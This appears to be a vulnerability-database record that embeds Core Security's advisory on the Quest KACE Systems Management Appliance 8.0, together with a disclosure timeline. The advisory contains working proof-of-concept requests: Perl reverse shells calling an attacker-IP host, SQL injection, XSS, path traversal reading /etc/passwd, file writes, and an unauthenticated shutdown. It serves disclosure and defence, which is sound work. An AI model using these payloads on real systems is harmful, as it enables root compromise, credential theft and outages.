4. Send final advisory version to\nvendor and coordinate publication date together. With regards to Quest\u0027s\nrequests, Core provided the researchers names and URL of the advisory when\nit will be published. Finally, Core stated that the request for other Core\ncompany services could be forwarded to the Core services team if needed\n(and asked the right contact at Quest) but our intention is to keep that\nservices request separate from the coordinated disclosure process. \n2018-04-18: Quest Support informed that they had publicly made available\npatches for its customers and unilaterally closed the case. \n2018-05-31: Advisory CORE-2018-0004 published. \n\n9. *References*\n\n[1] https://www.quest.com/products/kace-systems-management-appliance/\n\n10. *About CoreLabs*\n\nCoreLabs, the research center of Core Security, is charged with anticipating\nthe future needs and requirements for information security technologies. \nWe conduct our research in several important areas of computer security\nincluding system vulnerabilities, cyber-attack planning and simulation,\nsource code auditing, and cryptography. Our results include problem\nformalization, identification of vulnerabilities, novel solutions and\nprototypes for new technologies. CoreLabs regularly publishes security\nadvisories, technical papers, project information and shared software\ntools for public use at:\nhttp://corelabs.coresecurity.com. \n\n11. *About Core Security*\n\nCore Security provides companies with the security insight they need to\nknow who, how, and what is vulnerable in their organization. The company\u0027s\nthreat-aware, identity amp; access, network security, and vulnerability\nmanagement solutions provide actionable insight and context needed to\nmanage security risks across the enterprise. This shared insight gives\ncustomers a comprehensive view of their security posture to make better\nsecurity remediation decisions. Better insight allows organizations to\nprioritize their efforts to protect critical assets, take action sooner\nto mitigate access risk, and react faster if a breach does occur. \n\nCore Security is headquartered in the USA with offices and operations in\nSouth America, Europe, Middle East and Asia. To learn more, contact Core\nSecurity at (678) 304-4500 or info@coresecurity.com\n\n12. *Disclaimer*\n\nThe contents of this advisory are copyright (c) 2018 Core Security and (c)\n2018 CoreLabs, and are licensed under a Creative Commons Attribution\nNon-Commercial Share-Alike 3.0 (United States) License:\nhttp://creativecommons.org/licenses/by-nc-sa/3.0/us/\n\n13. *PGP/GPG Keys*\n\nThis advisory has been signed with the GPG key of Core Security\nadvisories team, which is available for download at\nhttp://www.coresecurity.com/files/attachments/core_security_advisories.asc",
"sources": [
{
"db": "NVD",
"id": "CVE-2018-11136"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-005458"
},
{
"db": "VULMON",
"id": "CVE-2018-11136"
},
{
"db": "PACKETSTORM",
"id": "148005"
}
],
"trust": 1.8
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2018-11136",
"trust": 2.6
},
{
"db": "JVNDB",
"id": "JVNDB-2018-005458",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201805-1218",
"trust": 0.6
},
{
"db": "PACKETSTORM",
"id": "148005",
"trust": 0.2
},
{
"db": "VULMON",
"id": "CVE-2018-11136",
"trust": 0.1
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2018-11136"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-005458"
},
{
"db": "PACKETSTORM",
"id": "148005"
},
{
"db": "NVD",
"id": "CVE-2018-11136"
},
{
"db": "CNNVD",
"id": "CNNVD-201805-1218"
}
]
},
"id": "VAR-201805-0596",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VARIoT devices database",
"id": null
}
],
"trust": 0.5800866
},
"last_update_date": "2023-12-18T12:01:57.551000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "KACE Systems Management Appliance",
"trust": 0.8,
"url": "https://www.quest.com/products/kace-systems-management-appliance/"
},
{
"title": "Quest KACE System Management Appliance SQL Repair measures for injecting vulnerabilities",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=81230"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2018-005458"
},
{
"db": "CNNVD",
"id": "CNNVD-201805-1218"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-89",
"trust": 1.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2018-005458"
},
{
"db": "NVD",
"id": "CVE-2018-11136"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.6,
"url": "https://www.coresecurity.com/advisories/quest-kace-system-management-appliance-multiple-vulnerabilities"
},
{
"trust": 0.9,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-11136"
},
{
"trust": 0.8,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-11136"
},
{
"trust": 0.1,
"url": "https://cwe.mitre.org/data/definitions/89.html"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov"
},
{
"trust": 0.1,
"url": "https://packetstormsecurity.com/files/148005/quest-kace-system-management-appliance-8.0-build-8.0.318-xss-traversal-code-execution-sql-injection.html"
},
{
"trust": 0.1,
"url": "http://corelabs.coresecurity.com/"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-11139"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-11134"
},
{
"trust": 0.1,
"url": "http://[serverip]/common/download_agent_installer.php?platform=windows\u0026serv=58b9e89c12f57e492df8f1d744b6ed5a4d394b454ca8a99176caba35fd13ec1f\u0026orgid=1"
},
{
"trust": 0.1,
"url": "http://[serverip]/systemui/settings_network.php"
},
{
"trust": 0.1,
"url": "https://support.quest.com/essentials/reporting-security-vulnerability."
},
{
"trust": 0.1,
"url": "http://[serverip]/adminui/advisory.php?id=10"
},
{
"trust": 0.1,
"url": "http://creativecommons.org/licenses/by-nc-sa/3.0/us/"
},
{
"trust": 0.1,
"url": "http://www.coresecurity.com/files/attachments/core_security_advisories.asc."
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-11135"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-11140"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-11132"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-11133"
},
{
"trust": 0.1,
"url": "https://www.quest.com/products/kace-systems-management-appliance/"
},
{
"trust": 0.1,
"url": "http://corelabs.coresecurity.com."
},
{
"trust": 0.1,
"url": "https://support.quest.com/essentials/vulnerability-reporting-acknowledgements)."
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-11141"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-11142"
},
{
"trust": 0.1,
"url": "https://support.quest.com/download-install-detail/6086148."
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-11138"
},
{
"trust": 0.1,
"url": "http://[serverip]/adminui/analysis_report_list.php?category_id="
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-11137"
},
{
"trust": 0.1,
"url": "http://[serverip]/common/run_cross_report.php?uniqueid=366314513\u0026id=585\u0026org=1\u0026fmt=xls34403\u0027)%3balert(1)%2f%2f952"
},
{
"trust": 0.1,
"url": "https://support.quest.com/kace-systems-management-appliance/kb/254193/security-vulnerability-patch-sec2018_20180410-"
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2018-11136"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-005458"
},
{
"db": "PACKETSTORM",
"id": "148005"
},
{
"db": "NVD",
"id": "CVE-2018-11136"
},
{
"db": "CNNVD",
"id": "CNNVD-201805-1218"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "VULMON",
"id": "CVE-2018-11136"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-005458"
},
{
"db": "PACKETSTORM",
"id": "148005"
},
{
"db": "NVD",
"id": "CVE-2018-11136"
},
{
"db": "CNNVD",
"id": "CNNVD-201805-1218"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2018-05-31T00:00:00",
"db": "VULMON",
"id": "CVE-2018-11136"
},
{
"date": "2018-07-18T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2018-005458"
},
{
"date": "2018-05-31T20:52:06",
"db": "PACKETSTORM",
"id": "148005"
},
{
"date": "2018-05-31T18:29:00.450000",
"db": "NVD",
"id": "CVE-2018-11136"
},
{
"date": "2018-06-01T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201805-1218"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2018-06-29T00:00:00",
"db": "VULMON",
"id": "CVE-2018-11136"
},
{
"date": "2018-07-18T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2018-005458"
},
{
"date": "2018-06-29T18:50:01.197000",
"db": "NVD",
"id": "CVE-2018-11136"
},
{
"date": "2018-06-01T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201805-1218"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "PACKETSTORM",
"id": "148005"
},
{
"db": "CNNVD",
"id": "CNNVD-201805-1218"
}
],
"trust": 0.7
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Quest KACE System Management Appliance In SQL Injection vulnerability",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2018-005458"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SQL injection",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201805-1218"
}
],
"trust": 0.6
}
}
VAR-201805-0592
Vulnerability from variot - Updated: 2023-12-18 12:01In order to perform actions that require higher privileges, the Quest KACE System Management Appliance 8.0.318 relies on a message queue that runs daemonized with root privileges and only allows a set of commands to be executed. A command injection vulnerability exists within this message queue which allows low-privilege users to append arbitrary commands that will be run as root. Quest KACE System Management Appliance Contains a command injection vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. QuestKACESystemManagementAppliance is an IT asset management device from QuestSoftware, USA. Core Security - Corelabs Advisory http://corelabs.coresecurity.com/
Quest KACE System Management Appliance Multiple Vulnerabilities
- Advisory Information
Title: Quest KACE System Management Appliance Multiple Vulnerabilities Advisory ID: CORE-2018-0004 Advisory URL: http://www.coresecurity.com/advisories/quest-kace-system-management-appliance-multiple-vulnerabilities Date published: 2018-05-31 Date of last update: 2018-05-22 Vendors contacted: Quest Software Inc. Release mode: Forced release
- Vulnerability Information
Class: Improper Neutralization of Special Elements used in an OS Command [CWE-78], Improper Neutralization of Special Elements used in an OS Command [CWE-78], Deserialization of Untrusted Data [CWE-502], Improper Privilege Management [CWE-269], Improper Privilege Management [CWE-269], Improper Authorization [CWE-285], Improper Neutralization of Special Elements used in an SQL Command [CWE-89], Improper Neutralization of Special Elements used in an SQL Command [CWE-89], Improper Neutralization of Input During Web Page Generation [CWE-79], External Control of File Name or Path [CWE-73], External Control of File Name or Path [CWE-73] Impact: Code execution Remotely Exploitable: Yes Locally Exploitable: Yes CVE Name: CVE-2018-11138, CVE-2018-11139, CVE-2018-11135, CVE-2018-11134, CVE-2018-11132, CVE-2018-11142, CVE-2018-11136, CVE-2018-11140, CVE-2018-11133, CVE-2018-11137, CVE-2018-11141
- Vulnerability Description
From Quest KACE's website:
"The KACE Systems Management Appliance [1] provides your growing organization with comprehensive management of network-connected devices, including servers, PCs, Macs, Chromebooks, tablets, printers, storage, networking gear and the Internet of Things (IoT). KACE can fulfill all of your organization's systems management needs, from initial deployment to ongoing management and retirement."
Multiple vulnerabilities were found in the Quest KACE System Management Virtual Appliance that would allow a remote attacker to gain command execution as root. We present three vectors to achieve this, including one that can be exploited as an unauthenticated user.
Additional web application vulnerabilities were found in the web console that is bundled with the product. These vulnerabilities are detailed in section 7.
Note: This advisory has limited details on the vulnerabilities because during the attempted coordinated disclosure process, Quest advised us not to distribute our original findings to the public or else they would take legal action. Quest's definition of "responsible disclosure" can be found at https://support.quest.com/essentials/reporting-security-vulnerability.
CoreLabs has been publishing security advisories since 1997 and believes in coordinated disclosure and good faith collaboration with software vendors before disclosure to help ensure that a fix or workaround solution is ready and available when the vulnerability details are publicized. We believe that providing technical details about each finding is necessary to provide users and organizations with enough information to understand the implications of the vulnerabilities against their environment and, most importantly, to prioritize the remediation activities aiming at mitigating risk.
We regret Quest's posture on disclosure during the whole process (detailed in the Report Timeline section) and the lack of a possibility of engaging into a coordinated publication date, something we achieve (and have achieved) with many vendors as part of our coordinated disclosure practices.
- Vulnerable Packages
. Quest KACE System Management Appliance 8.0 (Build 8.0.318) Other products and versions might be affected too, but they were not tested.
- Vendor Information, Solutions and Workarounds
Quest reports that it has released the security vulnerability patch SEC2018_20180410 to address the reported vulnerabilities. Patch can be download at https://support.quest.com/download-install-detail/6086148.
For more details, Quest published the following Security Note: https://support.quest.com/kace-systems-management-appliance/kb/254193/security-vulnerability-patch-sec2018_20180410-
- Credits
These vulnerabilities were discovered and researched by Leandro Barragan and Guido Leo from Core Security Consulting Services. The publication of this advisory was coordinated by Leandro Cuozzo from Core Advisories Team.
- Technical Description / Proof of Concept Code
Quest KACE SMA ships with a web console that provides administrators and users with several features. Multiple vulnerabilities were found in the context of this console, both from an authenticated and unauthenticated perspective.
Section 7.1 describes how an unauthenticated attacker could gain command execution on the system as the web server user.
Vulnerabilities described in 7.2 and 7.3 could also be abused to gain code execution but would require the attacker to have a valid authentication token.
In addition, issues found in the Sudo Server module presented in 7.4 and 7.5 would allow the attacker to elevate his privileges from the web server user to root, effectively obtaining full control of the device.
Additional web application vulnerabilities were found in the console, such as insufficient authorization for critical functions, which would allow an anonymous attacker to reconfigure the appliance (7.6), SQL injection vulnerabilities (7.7, 7,8), a cross-site scripting issue (7.9), and path traversal vulnerabilities, which would allow an attacker to read, write and delete arbitrary files (7.9, 7.10, 7.11).
7.1. Unauthenticated command injection
[CVE-2018-11138] The '/common/download_agent_installer.php' script is accessible to anonymous users in order to download an agent for a specific platform.
The script receives the following parameters via the GET method:
. platform: Indicates the platform in which the agent is going to be installed . serv: SHA256 hash of a fixed value that depends of each appliance . orgid: Organization ID . version: Version number of the agent
The last two conditions are simple to meet. The Agent versions are publicly available within the Quest KACE site, but even if they were not, we found that the Organization ID parameter is vulnerable to a time based SQL injection (refer to issue 7.7). This would make it possible to obtain the agent version by querying the table 'CLIENT_DISTRIBUTION' and fetching the contents of the 'VERSION' column. The Organization ID is 1 by default, but could be obtained in the same way as the Agent version by querying the table 'ORGANIZATION' and the column 'ID'.
As stated above, the application uses the Organization ID and Agent version parameters to execute commands. This means we need to find a way to append system commands within the Organization ID, without breaking the SQL query. If we use the comment symbol (#), we can append anything we want without affecting the result of the query.
Preparing payload:
/----- - platform = windows - serv = ceee78c2dc2af5587fa1e205d9a8cdfd55d7be35c7958858b5656d12550cc75c - orgid = 1#;perl -e 'use Socket;$i="[AttackerIP]";$p=8080;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/bash -i");};'; - version = 8.0.152 (last agent version available for windows) -----/
The following proof of concept executes a reverse shell:
/----- GET /common/download_agent_installer.php?platform=windows&serv=ceee78c2dc2af5587fa1e205d9a8cdfd55d7be35c7958858b5656d12550cc75c&orgid=1%23%3bperl+-e+'use+Socket%3b$i%3d"[AttackerIP]"%3b$p%3d8080%3bsocket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"))%3bif(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">%26S")%3bopen(STDOUT,">%26S")%3bopen(STDERR,">%26S")%3bexec("/bin/sh+-i")%3b}%3b'%3b&version=8.0.152 HTTP/1.1 Host: Server Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: close Upgrade-Insecure-Requests: 1 Content-Type: application/x-www-form-urlencoded Content-Length: 0 -----/
/----- $ nc -lvp 8080 Listening on [0.0.0.0] (family 0, port 8080) Connection from [ServerIP] port 8080 [tcp/http-alt] accepted (family 2, sport 20050) sh: can't access tty; job control turned off $ id uid=80(www) gid=80(www) groups=80(www) -----/
7.2. Authenticated command injection
[CVE-2018-11139] The '/common/ajax_email_connection_test.php' script used to test the configured SMTP server is accessible by any authenticated user and can be abused to execute arbitrary commands on the system. This script is vulnerable to command injection via the unsanitized user input 'TEST_SERVER' sent to the script via POST method.
The following proof of concept executes a reverse shell:
/----- POST /common/ajax_email_connection_test.php HTTP/1.1 Host: [ServerIP] Accept: application/json, text/javascript, /; q=0.01 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 416 Cookie: [Cookie] Connection: close
TEST_SERVER=test;perl+-e+'use+Socket%3b$i%3d"[AttackerIP]"%3b$p%3d8080%3bsocket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"))%3bif(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">%26S")%3bopen(STDOUT,">%26S")%3bopen(STDERR,">%26S")%3bexec("/bin/sh+-i")%3b}%3b';&TEST_PORT=587&TEST_USERNAME=eaea@eaea.com&TEST_PASSWORD=1234&TEST_OLD_PASSWORD=&QUEUE_ID=1&TEST_TO_EMAIL=eaea@eaea.com&ACTION=TEST_CONNECTION_SMTP -----/
/----- $ nc -lvp 8080 Listening on [0.0.0.0] (family 0, port 8080) Connection from [ServerIP] port 8080 [tcp/http-alt] accepted (family 2, sport 20050) sh: can't access tty; job control turned off $ id uid=80(www) gid=80(www) groups=80(www) -----/
7.3. PHP Object Injection leading to arbitrary command execution
[CVE-2018-11135] An authenticated user could abuse a deserialization call on the script '/adminui/error_details.php' to inject arbitrary PHP objects.
To exploit this issue, the parameter 'ERROR_MESSAGES' needs to be an array and meet some specific conditions in order to successfully exploit the issue.
7.4.
One of the available commands allows to change any user's password (including root).
Assuming we are able to run commands in the server, we could abuse this feature by changing the password of the 'kace_support' account, which comes disabled by default but has full sudo privileges.
7.5.
7.6. Insufficient Authorization for critical function
[CVE-2018-11142] 'systemui/settings_network.php' and 'systemui/settings_patching.php' scripts are accessible only from localhost. This restriction can be bypassed by modifying the 'Host' and 'X_Forwarded_For' HTTP headers.
The following proof of concept abuses this vulnerability to shutdown the server as an anonymous user:
/----- POST /systemui/settings_network.php HTTP/1.1 Host: localhost X-Forwarded-For: ::1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://[ServerIp]/systemui/settings_network.php Content-Type: multipart/form-data; boundary=---------------------------5642543667001619951434940129 Content-Length: 3418 Connection: close Upgrade-Insecure-Requests: 1
-----------------------------5642543667001619951434940129 Content-Disposition: form-data; name="CSRF_TOKEN" -----------------------------5642543667001619951434940129 Content-Disposition: form-data; name="$shutdown" DoIt! Content-Disposition: form-data; name="save" Save -----------------------------5642543667001619951434940129-- -----/
7.7. Unauthenticated SQL Injection in download_agent_installer.php
[CVE-2018-11136] The 'orgID' parameter received by the '/common/download_agent_installer.php' script is not sanitized, leading to SQL injection. In particular, a blind time based type.
The following proof of concept induces a time delay:
/----- http://[ServerIP]/common/download_agent_installer.php?platform=windows&serv=58b9e89c12f57e492df8f1d744b6ed5a4d394b454ca8a99176caba35fd13ec1f&orgid=1 AND SLEEP(10)%23;&version=8.0.152 -----/
7.8. SQL Injection in run_report.php
[CVE-2018-11140] The 'reportID' parameter received by the '/common/run_report.php' script is not sanitized, leading to SQL injection. In particular, an error based type.
The following proof of concept retrieves the current database name:
/----- POST /common/run_report.php HTTP/1.1 Content-Length: 161 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Host: [ServerIP] Accept: text/html,application/xhtml xml,application/xml;q=0.9,/;q=0.8 Connection: close Referer: http://[ServerIP]/adminui/analysis_report_list.php?CATEGORY_ID= Upgrade-Insecure-Requests: 1 Content-Type: application/x-www-form-urlencoded Cookie: [Cookie]
date=1516135247598&reportId=-3161+UNION+ALL+SELECT+CONCAT(0x7170706a71,IFNULL(CAST(DATABASE()+AS+CHAR),0x20),0x716a707171),NULL--+LhEx&reportName=&format=pdf -----/
/----- HTTP/1.1 200 OK Date: Thu, 08 Feb 2018 21:50:21 GMT Server: Apache Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Access-Control-Allow-Headers: x-kace-auth-timestamp, x-kace-auth-key, x-kace-auth-signature, accept, origin, content-type Access-Control-Allow-Origin: * Access-Control-Allow-Methods: PUT, DELETE, POST, GET, OPTIONS X-KACE-Appliance: K1000 X-KACE-Host: [ServerIP] X-KACE-Version: 8.0.318 X-KBOX-WebServer: [ServerIP] X-KBOX-Version: 8.0.318 X-KACE-WebServer: [ServerIP] X-UA-Compatible: IE=9,EDGE Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform Content-Length: 3548 Connection: close Content-Type: text/html; charset=utf-8
[...SNIPPED...]
<![endif]-->Report Queued: qppjqORG1qjpqq<meta http-equiv='refresh' [...SNIPPED...] -----/
7.9. Unauthenticated Cross Site Scriting in run_cross_report.php
[CVE-2018-11133] The 'fmt' parameter of the '/common/run_cross_report.php' script is vulnerable to cross-site scripting.
The following proof of concept demonstrates the vulnerability:
/----- http://[ServerIP]/common/run_cross_report.php?uniqueId=366314513&id=585&org=1&fmt=xls34403')%3balert(1)%2f%2f952 -----/
7.10. Path traversal in download_attachment.php leading to arbitrary file read
[CVE-2018-11137] The 'checksum' parameter of the '/common/download_attachment.php' script can be abused to read arbitrary files with 'www' privileges. The following proof of concept reads the '/etc/passwd' file. No administrator privileges are needed to execute this script.
It is worth noting that there are several interesting files that can be read with 'www' privileges, such as all the files located in '/kbox/bin/koneas/keys/' and '/kbox/kboxwww/include/globals.inc', which contain plaintext passwords.
/----- http://[ServerIP]/common/run_cross_report.php?uniqueId=366314513&id=585&org=1&fmt=xls34403')%3balert(1)%2f%2f952 -----/
The following proof of concept demonstrates the vulnerability:
/----- GET /common/download_attachment.php?checksum=/../../../../../../../../../../../etc/passwd&filename= HTTP/1.1 Host: [ServerIP] Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cookie: [Cookie] Connection: close Upgrade-Insecure-Requests: 1
HTTP/1.1 200 OK Date: Thu, 18 Jan 2018 17:18:19 GMT Server: Apache Cache-Control: must-revalidate, post-check=0, pre-check=0 Expires: -1 Pragma: public Content-Disposition: attachment; filename="" Content-Transfer-Encoding: Binary Content-Description: K1000 attachment Content-Length: 2400 Access-Control-Allow-Headers: x-kace-auth-timestamp, x-kace-auth-key, x-kace-auth-signature, accept, origin, content-type Access-Control-Allow-Origin: * Access-Control-Allow-Methods: PUT, DELETE, POST, GET, OPTIONS X-KACE-Appliance: K1000 X-KACE-Host: k10000. X-KACE-Version: 8.0.318 X-KBOX-WebServer: k10000. X-KBOX-Version: 8.0.318 X-KACE-WebServer: k10000. X-UA-Compatible: IE=9,EDGE Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform Connection: close Content-Type: application/octet-stream
$FreeBSD: releng/11.0/etc/master.passwd 299365 2016-05-10 12:47:36Z bcr $
root::0:0:Charlie &:/root:/bin/csh daemon::1:1:Owner of many system processes:/root:/usr/sbin/nologin operator::2:5:System &:/:/usr/sbin/nologin bin::3:7:Binaries Commands and Source:/:/usr/sbin/nologin tty:*:4:65533:Tty Sandbox:/:/usr/sbin/nologin[...SNIPPED...] -----/
7.11. Path traversal in advisory.php leading to arbitrary file creation/deletion
[CVE-2018-11141] The 'IMAGES_JSON' and 'attachments_to_remove[]' parameters of the '/adminui/advisory.php' script can be abused to write and delete files respectively. The following proof of concept creates a file located at '/kbox/kboxwww/resources/TestWrite' with the content 'Sarasa' (base64 encoded). Files can be at any location where the 'www' user has write permissions.
File deletion could be abused to delete '/kbox/kboxwww/systemui/reports/setup_completed.log' file. This file's existence defines if the appliance setup wizard is shown or not.
The following proof of concept demonstrates the vulnerability:
/----- POST /adminui/advisory.php?ID=10 HTTP/1.1 Host: [ServerIP] Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://[ServerIP]/adminui/advisory.php?ID=10 Content-Type: multipart/form-data; boundary=---------------------------2671551246366368501556269100 Content-Length: 1705 Cookie: [Cookie] Connection: close Upgrade-Insecure-Requests: 1
-----------------------------2671551246366368501556269100 Content-Disposition: form-data; name="CSRF_TOKEN"
99c2addf067719d6fc3ae32ded351f000af8efdd091f162baa2a34516cefecc741cb13a69c80554a9ba32908d1c683102d3455eac39bcafc8854f46a04b2044e -----------------------------2671551246366368501556269100 Content-Disposition: form-data; name="IMAGES_JSON"
{"/../../../resources/TestWrite":"aaaaaa,VGVzdENvbnRlbnQ="} -----------------------------2671551246366368501556269100 Content-Disposition: form-data; name="FARRAY[ID]" [...SNIPPED...] -----/
Taking advantage of 7.2 and 7.4 we are able to verify the file creation:
/----- [root@k10000 /kbox/kboxwww/resources]# ls -lha total 32 drwxr-xr-x 2 www wheel 512B Feb 9 20:40 . drwxr-xr-x 23 root wheel 512B Nov 14 18:29 .. -rw-r--r-- 1 www wheel 11B Feb 9 20:40 TestWrite -----/
-
Report Timeline 2018-02-26: Core Security (Core) sent an initial notification to Quest Software Inc. (Quest) via web form. 2018-03-05: Quest Support confirmed the receipt and requested additional information. 2018-03-12: Core Security sent a draft advisory including a technical description. 2018-03-16: Quest Support asked for the CVE-IDs. 2018-03-16: Core Security answered saying that the CVE-IDs are required once the vendor verifies the vulnerabilities. Additionally, Core Security requested a confirmation about the reported vulnerabilities and a tentative timescale to fix them. Finally, Core Security requested that Quest use Core's advisories-publication email address as the official communication hannel also copying the researchers behind this discovery. 2018-03-16: Quest Support thanked Core's reply and stated it will be in touch during the process. 2018-03-20: Quest Support informed that they had not yet received any updates from the engineering team and had requested one. 2018-03-21: Quest Support requested information about the KACE version used for reporting the issues and also Core's company name and information. 2018-03-21: Core replied with the affected version (that was included in the original draft advisory) and a link to the Core company website and the list of previous security advisories. 2018-03-21: Quest Support acknowledged the information provided. 2018-03-26: Quest's KACE product manager (PM) thanked Core for making it aware of the security issues found and the level of thoroughness and details provided. Quest specified it had fixes already in place for some of the issues. Quest's KACE PM asked for a conference call in order to understand more about Core's offerings for future engagements. Finally, Quest's KACE PM notified the work done by Core is in breach of its license agreement, and requested Core not to distribute the findings to the public, otherwise uest would take legal action. 2018-04-13: Quest's KACE PM sent a follow up email and informed that it made a hotfix to patch the reported vulnerabilities. Quest also requested a call meeting to understand future opportunities based on the Core's company capabilities. Finally, Quest asked for information about the researcher that found the vulnerabilities and a link of Core's choosing in order to be included in Quest's Acknowledgment page (https://support.quest.com/essentials/vulnerability-reporting-acknowledgements). 2018-04-16: Core answered email from 2018-03-26 stating the company is following standard practices with regards to coordinated vulnerability disclosure, and also sent detailed technical information about our findings at Quest's request. Core also mentioned Quest seems to be well versed in the disclosure process and expects vendors to coordinate with it prior to publication via Quest's vulnerability reporting process, and that Quest's legal threat appears to be in direct contradiction to the disclosure process that they encourage on their website. Finally, Core asked about Quest's intention to work collaboratively to address these vulnerabilities and to follow industry standard disclosure processes that involves publication of the vulnerabilities. 2018-04-17: Quest's KACE PM replied saying it is willing to collaborate and is looking forward to having a conversation over the phone in order to continue the next steps in its vulnerability process (forwarded email from 2018-04-13). 2018-04-17: Core thanked the answer and stated the willingness of keeping written communications between parties in order to better document the process and communicated the next steps of the process including: 1. Testing the fix (if vendor agrees), 2. Get CVE-IDs, 3. Get a Vendor's link to be included in the advisory and finally 4. Send final advisory version to vendor and coordinate publication date together. With regards to Quest's requests, Core provided the researchers names and URL of the advisory when it will be published. Finally, Core stated that the request for other Core company services could be forwarded to the Core services team if needed (and asked the right contact at Quest) but our intention is to keep that services request separate from the coordinated disclosure process. 2018-04-18: Quest Support informed that they had publicly made available patches for its customers and unilaterally closed the case. 2018-05-31: Advisory CORE-2018-0004 published.
-
References
[1] https://www.quest.com/products/kace-systems-management-appliance/
- About CoreLabs
